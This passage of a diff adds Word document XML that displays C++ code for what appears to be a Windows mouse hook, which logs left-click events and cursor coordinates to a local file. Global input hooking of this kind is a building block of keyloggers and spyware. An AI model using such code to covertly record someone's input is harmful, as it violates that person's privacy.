+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>MOUSE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fopen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>("mouse.txt", "a");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (nCode == 0)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">{ </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">if (pMouseStruct != </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>NULL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>switch</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (wParam){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>case</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>WM_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>LBUTTONUP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> result = "LEFT CLICK UP. Mouse Coordinates: x = " + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>to_string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(pMouseStruct-&gt;pt.x) + " | y = " + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>to_string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(pMouseStruct-&gt;pt.y)+"\n";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(MOUSE, "%s",result.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>c_str()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
         <w:t>}</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>break</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>case</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>WM_LBUTTONDOWN</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> result = "LEFT CLICK DOWN. Mouse Coordinates: x = " + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>to_string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(pMouseStruct-&gt;pt.x) + " | y = " + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>to_string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(pMouseStruct-&gt;pt.y)+"\n";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(MOUSE, "%s",result.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>c_str()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
